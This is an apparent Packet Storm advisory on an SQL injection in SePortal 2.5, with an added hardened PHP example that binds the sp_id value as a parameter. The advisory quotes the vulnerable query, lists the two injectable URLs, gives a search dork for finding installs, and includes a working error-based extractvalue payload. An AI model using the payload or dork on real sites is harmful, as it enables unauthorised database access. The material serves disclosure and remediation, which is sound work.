SePortal 2.5 SQL Injection

2014-03-19T00:00:00
ID PACKETSTORM:125785
Type packetstorm
Reporter jsass
Modified 2014-03-19T00:00:00

Description

                                        
`####################################################################  
Exploit: SePortal 2.5 SQL Injection Vulnerability  
Author: jsass  
Date : 19\03\2014  
Contact Twitter: @Kwsecurity  
Script: http://www.seportal.org/  
version: 2.5  
Tested on: Linux Ubuntu 12.4 & Windows 7  
Dork : "Powered by SePortal 2.5"  
  
//** Searching And Analysis By Kuwaity Crew **\\  
  
####################################################################  
SQL INJECTION Vulnerability  
  
code :  
$main_template = 'staticpages';  
  
define('GET_CACHES', 1);  
define('ROOT_PATH', './');  
define('GET_USER_ONLINE', 1);  
define('GET_STATS_BOX', 1);  
include(ROOT_PATH.'global.php');  
require(ROOT_PATH.'includes/sessions.php');  
  
// $sp_id is concatenated directly into the SQL string (the injection point)  
$sql = "SELECT *  
FROM ".STATICPAGE_TABLE."  
WHERE sp_id = '".$sp_id."'";  
$result = $site_db->query($sql);  
  
files:  
staticpages.php?sp_id=(inject here)  
print.php?mode=staticpage&client=printer&sp_id=(inject here)  
  
example:  
  
http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-  
  
//////////////////////////////////////////////////////////////////////////////////  
  
  
  
  
Greets: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & الشبح الدموي & medo medo & sec4ever.com & is-sec.com  
  
`
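
A hardened form of the `sp_id` lookup quoted in the advisory, as an added example that is not SePortal code and not the reporter's: it validates `sp_id` as a positive integer and then binds it as a parameter instead of concatenating it. Assumptions: PDO with an in-memory SQLite database stands in for `$site_db`, and the table name `demo_staticpages`, the `sp_title` column and the function `fetch_static_page` are constructed for the demonstration.

```php
<?php
// Added example, not SePortal code. The table name, the sp_title column and
// the in-memory SQLite database are constructed for this demonstration.
declare(strict_types=1);

const STATICPAGE_TABLE = 'demo_staticpages'; // constructed stand-in

/**
 * Return the static page row for a request-supplied sp_id, or null.
 * Two independent controls: strict integer validation, then a bound parameter.
 */
function fetch_static_page(PDO $db, $raw_sp_id): ?array
{
    // 1) sp_id is a numeric key: reject anything that is not a positive integer.
    $sp_id = filter_var($raw_sp_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($sp_id === false) {
        return null; // caller should answer 400/404 without running a query
    }

    // 2) Bind the value so it never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT * FROM ' . STATICPAGE_TABLE . ' WHERE sp_id = :sp_id');
    $stmt->bindValue(':sp_id', $sp_id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- constructed demo data ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ' . STATICPAGE_TABLE . ' (sp_id INTEGER PRIMARY KEY, sp_title TEXT)');
$db->exec('INSERT INTO ' . STATICPAGE_TABLE . " VALUES (1, 'About')");

// Second entry is the URL-decoded sp_id value from the advisory's example request.
$inputs = ['1', "1'  and extractvalue(rand(),concat(0x7e,version()))-- -", '', '0', 'abc'];

foreach ($inputs as $in) {
    $row = fetch_static_page($db, $in);
    printf("%-62s => %s\n", var_export($in, true), $row ? $row['sp_title'] : 'rejected');
}
```

The same check applies to both entry points the advisory lists, `staticpages.php` and `print.php`, since each passes `sp_id` from the request into the query.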